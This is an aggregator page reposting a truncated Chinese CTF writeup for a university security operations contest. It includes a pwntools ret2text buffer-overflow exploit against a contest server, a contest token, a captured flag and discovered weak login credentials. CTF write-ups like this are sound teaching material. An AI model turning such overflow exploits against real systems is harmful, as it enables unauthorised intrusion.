注册    登录
看啥推荐读物
专栏名称: 星盟安全
星盟安全工作室---“VENI VIDI VICI”(我来,我见,我征服),我们的征途是星辰大海。从事各类安全研究,专注于知识分享。
我也要提交微信公众号
今天看啥
微信公众号rss订阅, 微信rss, 稳定的RSS源
目录
今天看啥  ›  专栏  ›  星盟安全

高校网络安全管理运维赛 Writeup

星盟安全  · 公众号  ·  · 2024-05-12 16:06
PWNbabypwnret2textfrom pwn import * io = remote("prob07.contest.pku.edu.cn", 10007)# io = process("./pwn")context.log_level = "debug"io.sendlineafter(b"Please input your token: ", b"522:MEUCIQCosOLImE2i11gtdIBeP9r5hu3E3FWIZdqixPB_QpEjwAIgS009Snrl5oFLGCL_134AkS-89M8nG7kzl127hf29584=")io.sendafter(b"Enter your username:", b"root")# gdb.attach(io, "b* 0x4011E9")# pause()io.sendafter(b"Enter the password:", b"a" * 0x38 + p64(0x40117A))io.interactive()#flag{KooD1EijiemeePH8ieNei2XoL8iCh5de}Login没有附件,测试发现password存在栈溢出,并且会有回显数据发现登录账号和密码username: admin password: 1q2w3e4r尝试登录登录成功后发现回显数据有很明显的ELF文件头接收数据写入文件io.sendlineafter(b"Please input your token:", b"522:MEUCIQCosOLImE2i11gtdIBeP9r5hu3E3FWIZdqixPB_QpEjwAIgS009Snrl5oFLGCL_134AkS-89M8nG7kzl127hf29584=")io.sendlineafter(b"Username:", b"admin")io.sendlineafter(b"Password:", b"1q2w3e4r")io.recvuntil(b"Core dumped\n")hex_data ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
推荐文章
学习曾国藩  ·  一个人烂泥扶不上墙的10种表现,你有没有?
3 天前
学习曾国藩  ·  杨绛:一个女人有没有福相,只需看这三个地方!
3 天前
学习曾国藩  ·  曾国藩:判断一个人有没有前途,主要看这四个方面!
4 天前
学习曾国藩  ·  一个人越来越富有的四个迹象!
6 天前
混沌学园  ·  第486堂好课 | 李善友:生成式创造——直面业务“危机”,上下同欲重启增长
4 天前
龙说天下  ·  刚刚,中国海警发声!这次是鲎藤礁!
1 月前
MY聊审计  ·  CPA业务探讨丨质押的大额定期存单如何列报
2 年前
有书  ·  “我40岁,没出息,却拥有天底下最好的妈”
4 年前
北京生活杂志  ·  最完整小黄人番外短片合集,包含目前小黄人所有的短片。视频较长,建-20190324091635
5 年前
崩坏3  ·  律者档案 | 极限挑战开启!
6 年前
关于   移动版   ·   Py中国   ·   RSS之家   ·   codingpro   ·   Code   ·   link之家   ·   卧龙AI搜索   ·   藏经阁   ·   小百科
今天看啥 - 微信公众号rss订阅, 微信rss, 稳定的RSS源
© 2024 ~ 沪ICP备11025650号